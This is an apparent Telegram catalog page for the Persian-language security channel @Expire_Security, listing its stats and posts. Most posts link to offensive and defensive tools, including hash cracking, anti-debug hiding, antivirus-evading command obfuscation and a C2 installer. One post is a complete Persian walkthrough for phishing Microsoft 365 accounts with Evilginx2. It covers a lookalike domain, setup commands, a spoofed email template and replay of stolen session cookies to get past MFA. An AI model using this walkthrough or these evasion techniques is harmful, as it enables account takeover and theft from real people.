tgindex
ᎬᏡᏢᏆᏒᎬ ᎢᎬᎪᎷ

ᎬᏡᏢᏆᏒᎬ ᎢᎬᎪᎷ

Статистика
@Expire_Securityперсидский

Dear @durov In this channel there isn't any content that violates copyright laws. Contents of this channel are for helping people. Please ignore traitors reports. Thank yo ❗️ هر استفاده نادرست به عهده خود شخص میباشد ❗️

Последний пост
9 авг.
Последнее чтение
13 авг.
Постов за неделю
0
Всего постов
21
Тип
открытый
Язык
персидский
В каталоге с
13 авг.
Подписчики
4 214
−72 за 3 дн.
Сутки
−39
−0,92%
Неделя
 
Месяц
 
Просмотров на пост
5 154
20 постов
Вовлечённость
122,3%
к подписчикам
Постов в день
0,0
всего 21
Упоминаний
0
каналов
Охват размещения
оценка
1/24сутки в ленте
96
1/48двое суток
110
1/72трое суток
118

Оценка по просмотрам недавних постов: пост набирает почти всё за первые сутки.

Посты

  • 9 авг.109из RuzVPN

    ❤️ این کانفیگ رو تست کنین و نظرتون رو درباره‌ش بگین vless://ab3509a5-c256-4695-ac9b-9274b5637a06@ex.gredline.com:8443?security=reality&encryption=none&pbk=cx644M9eiVcGXDDycUOdinqiCd91BoQYxbuVw8ieFXo&headerType=none&fp=chrome&spx=%2F4344df807f7779d&type=tcp&flow=xtls-rprx-vision&sni=www.cloudflare.com&sid=3a25a573cc#RuzVPN

  • 20 мар.1 8387 5041

    عیدتون مبارک ❤️ ۱ سال دیگه هم زنده ماندیم 🔥

  • 5 нояб.11,1 тыс1 02011

    🔥 ایده و کانسپت من برای گیفت‌های مناسبتی: سوزاندن گیفت‌های قدیمی برای خرید گیفت‌های جدید. از اون‌جایی که احتمالاً قراره بی‌نهایت گیفت مناسبتی داشته باشیم، به نظرم خیلی خوب میشه اگه خرید بعضی از این گیفت‌ها نیاز به سوزوندن گیفت‌های قدیمی همون مناسبت داشته…

  • 5 нояб.10,8 тыс5

    без подписи

  • 5 нояб.10,7 тыс6

    без подписи

  • 5 нояб.10,8 тыс48 тыс5

    🔥 ایده و کانسپت من برای گیفت‌های مناسبتی: سوزاندن گیفت‌های قدیمی برای خرید گیفت‌های جدید. از اون‌جایی که احتمالاً قراره بی‌نهایت گیفت مناسبتی داشته باشیم، به نظرم خیلی خوب میشه اگه خرید بعضی از این گیفت‌ها نیاز به سوزوندن گیفت‌های قدیمی همون مناسبت داشته باشه. 📈 مثلاً برای خرید گیفت 🎁 در ولنتاین، کاربر ابتدا باید یکی از گیفت‌های 🎁 یا 🎁 که مربوط به ولنتاین قبلی بودن رو بسوزونه و سپس با پرداخت استارز گیفت جدید رو بخره. • چرا ایده خوبیه؟ - از خرید انبوه ربات‌ها خلاص میشیم. - ساپلای گیفت‌های قدیمی کم میشه. - هربار گیفت جدید میاد به جای اینکه گیفت‌های قدیمی فراموش و بی‌ارزش بشن، ارزششون بالاتر میره. - سوزوندن صرفا قفل خریدن رو باز میکنه و نیازه که بعدش استارز پرداخت بشه، پس تلگرام ضرری نمیکنه و همه چیز دو سر سود هست.

  • 12 сент. 2025 г.15,2 тыс13,3 тыс17

    🔥 برای دریافت قیمت گیفت خود کافی است لینک گیفت را ارسال کنید. مانند: t.me/nft/VintageCigar-10319 💥 یا اسم گیفت را به همراه علامت سوال وارد کنید. مانند: Pepe? 🆔 @EX_Panel_Bot 🆔

  • 29 авг. 2025 г.12,8 тыс10,3 тыс7

    🔎Searches Hash APIs to crack your hash quickly🔎 If hash is not found, automatically pipes into HashCat⚡ https://github.com/bee-san/Search-That-Hash ⚜️ @Expire_Security ⚜️

  • Cybersecurity AI (CAI), an open Bug Bounty-ready Artificial Intelligence https://github.com/aliasrobotics/cai ⚜️ @Expire_Security ⚜️

  • ⭕️ وب سرویس پیشرفته قیمت گیفت ⭕️ ⚙هم قیمت پورتال میده هم تونل و هم مارکت🔵 🕦 تغییرات ۲۴ ساعته و هفتگی 🕦 🖥 نمایش مقدار سود ضرر گیفت 🖥 😵🤔🙁😝 @Dev_Clown 😤☹️🙁☹️

  • QLPro: Automated Code Vulnerability Discovery via LLM and Static Code Analysis Integration ⚜️ @Expire_Security ⚜️

  • مرحله ۱ ساخت یک سایت جعلی خیلی شبیه سایت اصلی مایکروسافت

  • ⭐️دسترسی به حساب Microsoft 365 که با رمز عبور و تایید دومرحله‌ای MFA محافظت شده بدون نیاز به داشتن رمز یا عبور از MFA مرحله ۱ ساخت یک سایت جعلی خیلی شبیه سایت اصلی مایکروسافت کاری که می‌کنیم یه دامنه تقلبی ثبت می‌کنیم مثلا m1crosoft-support.com به جای حرف i از عدد 1 استفاده کردیم این دامنه باعث میشه کاربر فکر کنه وارد سایت اصلی مایکروسافته دامنه رو از یه جایی می‌خریم که گواهی امنیتی رایگان HTTPS میده مثل Namecheap Porkbun تنظیم می‌کنیم که این دامنه به سرور ما VPS وصل بشه مرحله ۲ راه‌اندازی ابزار Evilginx2 روی سرور Evilginx2 یه ابزار فیشینگ حرفه‌ایه که کمک می‌کنه بدون نیاز به رمز یا MFA توکن ورود Session Token قربانی رو بدزدیم ما یک سرور مجازی میخوایم یه ایپی پابلیک داشته باشه نصب ابزارها با دستور sudo apt update && sudo apt install git make gcc certbot -y git clone https://github.com/kgretzky/evilginx2.git cd evilginx2 make sudo ./bin/evilginx تنظیمات اولیه برای دامنه config domain m1crosoft-support.com config ip آی پی سرور شما config redirect_url https://login.microsoftonline.com config site microsoft enable microsoft گرفتن گواهی امنیتی HTTPS رایگان sudo certbot certonly --manual -d m1crosoft-support.com --preferred-challenges dns و بعد فایل‌های امنیتی رو به Evilginx2 معرفی میکنیم config certpath /etc/letsencrypt/live/m1crosoft-support.com/fullchain.pem config keypath /etc/letsencrypt/live/m1crosoft-support.com/privkey.pem مرحله ۳ فرستادن ایمیل جعلی فیشینگ به کاربر هدف هدف اینه که کاربر روی لینک جعلی کلیک کنه نمونه متن ایمیل میتونه به این صورت باشه موضوع : مهم تغییر اجباری رمز حساب Microsoft 365 کاربر گرامی برای امنیت بیشتر حساب شما لطفا با کلیک روی لینک زیر رمز عبور خود را تغییر دهید https://m1crosoft-support com/auth ترفندهایی که میتونیم بزنیم: جعل فرستنده ایمیل طوری که از طرف Microsoft به نظر برسه استفاده از لینک‌های کوتاه یا QR Code برای پنهان کردن لینک جعلی ارسال ایمیل در ساعات اداری برای افزایش احتمال کلیک مرحله ۴ دزدیدن Session Token بعد از کلیک کاربر وقتی کاربر روی لینک کلیک می‌کنه سایت جعلی ما باز میشه Evilginx2 اطلاعات ورود کاربر رو می‌گیره ولی هم‌زمان کاربر واقعا وارد Microsoft میشه در پشت صحنه ما توکن‌های ورود Session Token رو از مرورگر کاربر می‌گیریم مثلا چیزی شبیه این توی لاگ‌ها ظاهر میشه Captured new credentials Username user@company.com Session Tokens {...} مرحله ۵ ورود به حساب Microsoft 365 بدون رمز یا MFA الان که توکن‌ها رو داریم نیازی به رمز عبور یا تایید MFA نیست برای استفاده از توکن مرورگر مثلا Chrome رو باز کن یه تب مخفی incognito باز کن برو به DevTools F12 تب Application بخش Cookies مقادیر توکن کاربر که از Evilginx گرفتی رو به کوکی‌ها اضافه کن صفحه Microsoft 365 رو ریفرش کن ورود موفقیت آمیز بدون رمز و بدون MFA انجام میشه #red_team #phising #Evilginx2 ⚜️ @Expire_Security ⚜️

  • ⚜️ @Expire_Security ⚜️

  • без подписи

  • TitanHide چیه؟ یه درایوره که کمک میکنه دیباگر (Debugger) رو از دید بعضی برنامه‌ها مخفی کنی با یه ترفندهایی توی کرنل ویندوز (مثل هوک کردن توابع سیستمی) کاری می‌کنه برنامه نفهمه داره دیباگ میشه فقط کافیه id پردازش و گزینه‌هایی که می‌خوای مخفی بشن رو بهش بدی خودش بقیه کارها رو میکنه https://github.com/mrexodia/TitanHide ⚜️ @Expire_Security ⚜️

  • دور زدن آنتی‌ویروس با مبهم‌سازی خط فرمان command line obfuscation یک تکنیک حرفه‌ ای برای فرار از شناسایی سیستم‌های امنیتی یه پژوهشگر امنیت سایبری به نام Wietze Beukema نشون داده که چطور میشه با ترفندهایی ساده ولی خلاقانه دستورات خط فرمان ویندوز رو طوری نوشت که کار همیشگی رو انجام بدن ولی توسط ابزارهای امنیتی مثل انتی ویروس ها و EDR شناسایی نشن چطوری ممکنه؟ بعضی از برنامه‌های سیستمی ویندوز به دلیل طراحی خاص یا قدیمی بودن پارامترهای دستوری رو به شکل‌های مختلف می‌ پذیرن مثلاً: استفاده از / به‌جای - وارد کردن کاراکترها با فرمت یونیکد (مثل U+2044 به‌جای /) یا ترکیب‌های نا اشنا که همچنان معتبر هستن ابزار ArgFuscator: Beukema برای راحت‌تر شدن کار یه ابزار ساخته به اسم ArgFuscator که می‌تونه این دستورات مبهم‌ شده رو تولید کنه این ابزار برای تست سیستم‌های دفاعی خیلی مفیده لینک مقاله + ابزار: https://www.wietzebeukema.nl/blog/bypassing-detections-with-command-line-obfuscation ⚜️ @Expire_Security ⚜️

  • یک رول Ansible که وظیفه اش نصب و راه‌اندازی Adaptix C2 (هم سرور و هم کلاینت) روی سیستم‌ های مبتنی بر Debian/Ubuntu هست https://github.com/badsectorlabs/ludus_adaptix_c2 ⚜️ @Expire_Security ⚜️

  • ابزار mcp-scan یک ابزار امنیتی متن‌باز برای اسکن و تحلیل سرورهای MCP (Modular Compute Platform) است که توسط invariantlabs-ai توسعه داده شده این ابزار به‌طور خاص طراحی شده برای شناسایی آسیب‌پذیری‌ها و پیکربندی‌های نادرست در محیط‌های MCP https://github.com/invariantlabs-ai/mcp-scan ⚜️ @Expire_Security ⚜️

  • Open-Source Evaluation & Testing for AI & LLM systems https://github.com/Giskard-AI/giskard ⚜️ @Expire_Security ⚜️